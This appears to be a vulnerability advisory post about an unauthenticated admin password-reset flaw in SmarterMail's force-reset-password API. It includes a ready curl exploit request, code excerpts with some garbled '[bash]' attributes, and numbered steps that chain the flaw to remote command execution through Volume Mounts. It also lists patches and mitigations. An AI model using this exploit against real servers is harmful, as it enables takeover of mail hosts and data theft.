SmarterMail, Authentication Bypass, WT-2026-0001 (Critical)

Listen to this Post

The vulnerability is in the `ForceResetPassword` API endpoint within the AuthenticationController. This endpoint is decorated with [AuthenticatedService(AllowAnonymous = true)], permitting unauthenticated access. When a HTTP POST request is sent to /api/v1/auth/force-reset-password, the method processes a `ForceResetPasswordInputs` object from the request body. A critical user-controlled property is IsSysAdmin. When this boolean is set to true, the code path for resetting a system administrator’s password is executed. This path calls `AdministratorGetByUsername(inputs.Username)` to retrieve the administrator’s database record. It then validates the strength of the attacker-supplied `NewPassword` but crucially skips any verification of the `OldPassword` or a password reset token. Finally, it creates a new `db_system_administrator` object with the new password hash and calls `AdministratorUpdate` to save it to the database. This allows an unauthenticated attacker to reset any known administrator account’s password. With system admin access, an attacker can navigate to built-in features like “Volume Mounts” and execute arbitrary OS commands via the “Volume Mount Command” field, leading to full host compromise.
Platform: SmarterMail
Version: Prior build 9511
Vulnerability: Authentication bypass API
Severity: Critical
date: 2026-01-15

Prediction: Patched 2026-01-15

What Undercode Say:

Bash Commands:

curl -X POST https://target:9998/api/v1/auth/force-reset-password -H "Content-Type: application/json" -d '{"IsSysAdmin":"true","Username":"admin","NewPassword":"AttackerP@ss123","ConfirmPassword":"AttackerP@ss123"}'

Related Code:

// From SmarterMail.Web.Api.AuthenticationController
[bash]
[Route("force-reset-password")]
[AuthenticatedService(AllowAnonymous = true)] // Allows unauthenticated access
public ActionResult<ResetPasswordResult> ForceResetPassword([bash] ForceResetPasswordInputs inputs)
{
// ... calls instance.ForcePasswordReset(inputs, ...);
}
// In the ForcePasswordReset method logic branch for inputs.IsSysAdmin == true
db_system_administrator_readonly admin = SystemRepository.Instance.AdministratorGetByUsername(inputs.Username);
// ... validates new password strength only ...
db_system_administrator item = new db_system_administrator
{
guid = admin.guid,
Password = inputs.NewPassword, // Attacker-controlled value
};
SystemRepository.Instance.AdministratorUpdate(item, ...); // Updates password without authentication

How Exploit:

1. Attacker identifies target SmarterMail instance.

  1. Sends crafted POST request to `force-reset-password` endpoint with IsSysAdmin=true, a known or guessed admin Username, and a new NewPassword.

3. Request succeeds, resetting the administrator’s password.

4. Attacker logs in with new credentials.

5. Navigates to Settings -> Volume Mounts.

  1. Enters OS command in “Volume Mount Command” field, gaining immediate RCE.

Protection from this CVE

Update to build 9511+.

Restrict network access.

Monitor authentication logs.

Impact

Full system compromise.

Unauthenticated admin takeover.

Remote code execution.

Complete data breach.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top